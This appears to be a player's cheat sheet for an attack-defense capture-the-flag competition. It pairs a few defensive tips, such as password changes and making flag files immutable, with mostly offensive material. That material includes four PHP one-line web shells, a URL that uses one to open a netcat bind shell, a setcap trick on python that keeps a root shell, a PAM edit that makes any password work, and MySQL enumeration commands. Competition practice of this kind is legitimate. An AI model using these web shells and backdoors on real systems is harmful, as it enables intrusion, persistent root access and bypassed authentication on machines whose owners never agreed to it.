Team of 4 or 5
One Linux Box
One Window Box
If there are root/admin passwords, change them immediately. Change any other passwords on the box as well, as long as they aren’t used by the scoring bot/service.
Defending 2-3 services on each box. I don’t remember all the services but there was ftp and a wikipedia (TikiWiki). I think there was another web-service as well.
FTP. Your boxes are the same as everyone elses. Get login details so you can remote into your opponents boxes.
Key Point: Any login that works on your box, works on other peoples box. If you have a login to the TikiWiki admin, you have a login to THEIR TikiWiki.
WEB STUFF:
web shell:
<?php echo exec($_GET["password"]);?> <?php echo shell_exec($_GET["password"]);?> <?php system($_GET["password"],$retval);?> <?php passthru($_GET["password"]);?>
Use it like this:
http://target_ip/filename_with_this_phpline.php?password=nc -l -p 59741 -e /bin/sh
DEFENSE:
Change permissions on flag files to ONLY be readable.
Make your flag files immutable (unable to be changed)
chattr +i /path/to/flag/file
OFFENSE:
If you get on another persons box, heres some sneaky tips (that require root):
setcap CAP_SETUID=ep `which python`
^ after doing this, you can get a root shell at any time: python -c "import os;os.setuid(0);os.seteuid(0);os.system('/bin/bash')"'
This sets the suid bit on a program, without having the suid bit set 😀
———————————
Look for these lines like this in the /etc/pam.d/common-auth file:
auth [success=1 default=ignore] pam_unix.so nullok_secure auth requisite pam_deny.so
Change it to this:
auth [success=1 default=1] pam_unix.so nullok_secure
This allows any username/password combination to work. You basically nullify password checking, all logins are allowed.
———————————-
MYSQL (if its there):
mysql -p (connects as current user, you provide a password. Try without -p for passwordless login) show databases; (shows databases) connect DB_NAME; show tables; select * from TABLE_NAME; (this should get you started)